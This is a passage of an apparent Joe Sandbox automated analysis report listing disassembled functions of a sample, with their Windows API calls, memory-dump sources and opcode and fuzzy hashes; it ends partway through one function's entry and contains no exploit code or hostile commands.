                                                                      • Opcode ID: 5f4cee97581f78b9dbe2a07d0ffa6e2e5195d3d4e92f1ecf88dd094054159b24
                                                                      • Instruction ID: 62e56c5480f10bd5082c917ba0231d11a4f05025d1b137b389e8eed819176691
                                                                      • Opcode Fuzzy Hash: 5f4cee97581f78b9dbe2a07d0ffa6e2e5195d3d4e92f1ecf88dd094054159b24
                                                                      • Instruction Fuzzy Hash: 3CF01D31442B12AFD741AB94EE88BDABA25FF01712F401015F202548A4CB749466CF90
                                                                      Function 00A41C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A41DC0
                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A41DE1
                                                                      • WSAGetLastError.WSOCK32 ref: 00A41DF2
                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00A41EDB
                                                                      • inet_ntoa.WSOCK32(?), ref: 00A41E8C
                                                                        • Part of subcall function 00A239E8: _strlen.LIBCMT ref: 00A239F2
                                                                        • Part of subcall function 00A43224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00A3EC0C), ref: 00A43240
                                                                      • _strlen.LIBCMT ref: 00A41F35
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 3203458085-0
                                                                      • Opcode ID: 19654477c7de6d45f25c119e92b5e49431080b0ceefe825c5b11ab86f05c3c2f
                                                                      • Instruction ID: a900cc11b316dbf5f6a7f1b5abee7ec3f06faad5cefc9a152cf59ee2ce4ac245
                                                                      • Opcode Fuzzy Hash: 19654477c7de6d45f25c119e92b5e49431080b0ceefe825c5b11ab86f05c3c2f
                                                                      • Instruction Fuzzy Hash: F7B1CD39604340AFC324DF24C895F2A7BA5AFC4318F54894DF45A5B2E2DB71ED86CB92
                                                                      Function 009C5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClientRect.USER32(?,?), ref: 009C5D30
                                                                      • GetWindowRect.USER32(?,?), ref: 009C5D71
                                                                      • ScreenToClient.USER32(?,?), ref: 009C5D99
                                                                      • GetClientRect.USER32(?,?), ref: 009C5ED7
                                                                      • GetWindowRect.USER32(?,?), ref: 009C5EF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$Client$Window$Screen
                                                                      • String ID:
                                                                      • API String ID: 1296646539-0
                                                                      • Opcode ID: 33a953fc9bad7bdff6a9c2dd7e58428942d52dfc034beedb8eca3313bcf39f62
                                                                      • Instruction ID: 2133c070e327cebc9083dd3e85ce9f1d2f55e5bcd5523dffd4d4f779b33e01c1
                                                                      • Opcode Fuzzy Hash: 33a953fc9bad7bdff6a9c2dd7e58428942d52dfc034beedb8eca3313bcf39f62
                                                                      • Instruction Fuzzy Hash: 55B16A74A0074ADBDB14CFA8C480BEAB7F1BF58310F14881AE8A9D7294D734AA91DB51
                                                                      Function 009F01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __allrem.LIBCMT ref: 009F00BA
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009F00D6
                                                                      • __allrem.LIBCMT ref: 009F00ED
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009F010B
                                                                      • __allrem.LIBCMT ref: 009F0122
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009F0140
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 1992179935-0
                                                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                      • Instruction ID: 6d83fda93c773b68462c7e3a679fdf52a875278de0e7c25f28254b384f15110c
                                                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                      • Instruction Fuzzy Hash: 2181E672B00B0A9BE7219F69CC51B7A73EDEF81724F24453AF651D6682EB70DD008B50
                                                                      Function 009F61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,009E82D9,009E82D9,?,?,?,009F644F,00000001,00000001,8BE85006), ref: 009F6258
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009F644F,00000001,00000001,8BE85006,?,?,?), ref: 009F62DE
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009F63D8
                                                                      • __freea.LIBCMT ref: 009F63E5
                                                                        • Part of subcall function 009F3820: RtlAllocateHeap.NTDLL(00000000,?,00A91444,?,009DFDF5,?,?,009CA976,00000010,00A91440,009C13FC,?,009C13C6,?,009C1129), ref: 009F3852
                                                                      • __freea.LIBCMT ref: 009F63EE
                                                                      • __freea.LIBCMT ref: 009F6413
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1414292761-0
                                                                      • Opcode ID: 4ed47ea5dcab834b2a90f225a045049738748f06bace5ad4bbfb799bbee46e9a
                                                                      • Instruction ID: 9c915a6c766733d21bb0f96ed3f08f69a32520caa420762abfe7edb788ee49f7
                                                                      • Opcode Fuzzy Hash: 4ed47ea5dcab834b2a90f225a045049738748f06bace5ad4bbfb799bbee46e9a
                                                                      • Instruction Fuzzy Hash: 6F51DF72A0031AABEB258F64CC81FBF77AAEB94760F154629FA05D7140DB74DC44C7A0
                                                                      Function 00A4BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 00A4C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A4B6AE,?,?), ref: 00A4C9B5
                                                                        • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4C9F1
                                                                        • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4CA68
                                                                        • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4CA9E
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A4BCCA
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A4BD25
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A4BD6A
                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A4BD99
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A4BDF3
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00A4BDFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                      • String ID:
                                                                      • API String ID: 1120388591-0
                                                                      • Opcode ID: 0f82996ccc6c1ce4d2c57ff605407344bcaf45065ec252f08246fb5fc1484cd2
                                                                      • Instruction ID: d639215aa0bc5b7aa8c5ee623c848c7c965b199e5ab65e8e75dae41cf791f747
                                                                      • Opcode Fuzzy Hash: 0f82996ccc6c1ce4d2c57ff605407344bcaf45065ec252f08246fb5fc1484cd2
                                                                      • Instruction Fuzzy Hash: 4A816C34618241AFD714DF24C895E2ABBE5FFC4318F14899CF4594B2A2DB31ED45CBA2
                                                                      Function 00A1F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000035), ref: 00A1F7B9
                                                                      • SysAllocString.OLEAUT32(00000001), ref: 00A1F860
                                                                      • VariantCopy.OLEAUT32(00A1FA64,00000000), ref: 00A1F889
                                                                      • VariantClear.OLEAUT32(00A1FA64), ref: 00A1F8AD
                                                                      • VariantCopy.OLEAUT32(00A1FA64,00000000), ref: 00A1F8B1
                                                                      • VariantClear.OLEAUT32(?), ref: 00A1F8BB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                      • String ID:
                                                                      • API String ID: 3859894641-0
                                                                      • Opcode ID: d4b78ec3dd1b68983370a77d8469ef06068acee1b7fba0cf703e2ce2fa3c2303
                                                                      • Instruction ID: 613fc56f2b1c4a11272abb5bb5d2f21ac6553de4f0a0886610ba59ee78e61b63
                                                                      • Opcode Fuzzy Hash: d4b78ec3dd1b68983370a77d8469ef06068acee1b7fba0cf703e2ce2fa3c2303
                                                                      • Instruction Fuzzy Hash: 2B51C735500390BFCF10AB65D895BA9B3B9EF45710F24846BF806DF295DB708C80CB96
                                                                      Function 00A3910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C7620: _wcslen.LIBCMT ref: 009C7625
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00A394E5
                                                                      • _wcslen.LIBCMT ref: 00A39506
                                                                      • _wcslen.LIBCMT ref: 00A3952D
                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00A39585
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                      • String ID: X
                                                                      • API String ID: 83654149-3081909835
                                                                      • Opcode ID: ee631019b7e0465f687e702c8b503d8a322d20e7d3fe84730f56004690e6c61f
                                                                      • Instruction ID: d8b51d059d8ac962ffb958bafaf98d81d451af176eab10800d71809e77624743
                                                                      • Opcode Fuzzy Hash: ee631019b7e0465f687e702c8b503d8a322d20e7d3fe84730f56004690e6c61f
                                                                      • Instruction Fuzzy Hash: 2DE17B71A083409FD724EF24C885F6AB7E4BF84314F04896DF8999B2A2DB71DD45CB92
                                                                      Function 009D920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                      • BeginPaint.USER32(?,?,?), ref: 009D9241
                                                                      • GetWindowRect.USER32(?,?), ref: 009D92A5
                                                                      • ScreenToClient.USER32(?,?), ref: 009D92C2
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009D92D3
                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 009D9321
                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A171EA
                                                                        • Part of subcall function 009D9339: BeginPath.GDI32(00000000), ref: 009D9357
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 3050599898-0
                                                                      • Opcode ID: 9ed566b442f2045092ae5bd241658bd0fc5a4f23703a44a7ce96b7f0dd1f1ff5
                                                                      • Instruction ID: a4f98d113d95cf1fb1f1d62634e2d1717c87c0fc03de78b771d907cb995a3437
                                                                      • Opcode Fuzzy Hash: 9ed566b442f2045092ae5bd241658bd0fc5a4f23703a44a7ce96b7f0dd1f1ff5
                                                                      • Instruction Fuzzy Hash: B941B030244301AFD711EFA4DC84FBA7BB8FB45761F14462AFA64972B1C7319846DB61
                                                                      Function 00A307EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A3080C
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00A30847
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00A30863
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00A308DC
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00A308F3
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A30921
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3368777196-0
                                                                      • Opcode ID: 9518638517145561d3244f7255b94b258a5521bdbd29f55b25150e2d788d0a1e
                                                                      • Instruction ID: 4fedb1d12b0eb6a4de78d1b857fec03937c1b6b199ebe0242f5799075b847367
                                                                      • Opcode Fuzzy Hash: 9518638517145561d3244f7255b94b258a5521bdbd29f55b25150e2d788d0a1e
                                                                      • Instruction Fuzzy Hash: 94416A71900205EFDF15EF94DC85AAAB7B8FF44310F1480A9FD059A29ADB30DE61DBA0
                                                                      Function 00A581DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00A1F3AB,00000000,?,?,00000000,?,00A1682C,00000004,00000000,00000000), ref: 00A5824C
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00A58272
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A582D1
                                                                      • ShowWindow.USER32(00000000,00000004), ref: 00A582E5
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00A5830B
                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A5832F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: daf8aa955616f003ea9b9ea77291a005614bf4910b7bad173096a44049488403
                                                                      • Instruction ID: 03ee6c846c8fbf17d3c039adc3292fd1f4d458b98839c9c5f3c865aa191c45d1
                                                                      • Opcode Fuzzy Hash: daf8aa955616f003ea9b9ea77291a005614bf4910b7bad173096a44049488403
                                                                      • Instruction Fuzzy Hash: 3641D530601740AFDF12CF54C899BE87BE0FB0A726F184169E9189F272CB35A84ACF40
                                                                      Function 00A24C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00A24C95
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A24CB2
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A24CEA
                                                                      • _wcslen.LIBCMT ref: 00A24D08
                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A24D10
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00A24D1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 72514467-0
                                                                      • Opcode ID: 81b05dc71348051bdf1612788b6fb6bcb3f9d44fc8ee239dde06046d46912cc5
                                                                      • Instruction ID: 12246e373b8ec9051f63942e9d61c66ab54254c52c177afac1f335ad5eb97b2b
                                                                      • Opcode Fuzzy Hash: 81b05dc71348051bdf1612788b6fb6bcb3f9d44fc8ee239dde06046d46912cc5
                                                                      • Instruction Fuzzy Hash: FA21D7722042107BEB159B7DAC4AE7B7BACDF49760F10803AF805CA192EA65DD0196A0
                                                                      Function 00A3581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C3A97,?,?,009C2E7F,?,?,?,00000000), ref: 009C3AC2
                                                                      • _wcslen.LIBCMT ref: 00A3587B
                                                                      • CoInitialize.OLE32(00000000), ref: 00A35995
                                                                      • CoCreateInstance.OLE32(00A5FCF8,00000000,00000001,00A5FB68,?), ref: 00A359AE
                                                                      • CoUninitialize.OLE32 ref: 00A359CC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 3172280962-24824748
                                                                      • Opcode ID: 9b042750f7a2ee6a73c1028c84d9da219da5f3af7ce172afff48e0e8d7e03ae0
                                                                      • Instruction ID: 77115dcb78eca86dea337c100989d110a0f1b10dc61149803eff26b5abba703a
                                                                      • Opcode Fuzzy Hash: 9b042750f7a2ee6a73c1028c84d9da219da5f3af7ce172afff48e0e8d7e03ae0
                                                                      • Instruction Fuzzy Hash: 36D13F71A087019FC714DF28C484A2ABBE5FF89724F14895DF88A9B361DB31ED45CB92
                                                                      Function 00A2175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00A20FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A20FCA
                                                                        • Part of subcall function 00A20FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A20FD6
                                                                        • Part of subcall function 00A20FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A20FE5
                                                                        • Part of subcall function 00A20FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A20FEC
                                                                        • Part of subcall function 00A20FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A21002
                                                                      • GetLengthSid.ADVAPI32(?,00000000,00A21335), ref: 00A217AE
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A217BA
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00A217C1
                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A217DA
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00A21335), ref: 00A217EE
                                                                      • HeapFree.KERNEL32(00000000), ref: 00A217F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 3008561057-0
                                                                      • Opcode ID: 26aecefc009bf473cfae1e515bd95a75ec0f84eba84a000361f2e0b06f65f6a3
                                                                      • Instruction ID: 37e322c2237fa6e27f1a651cb898078b3a7f1c029dc3b9e817b69e89d0c55df5
                                                                      • Opcode Fuzzy Hash: 26aecefc009bf473cfae1e515bd95a75ec0f84eba84a000361f2e0b06f65f6a3
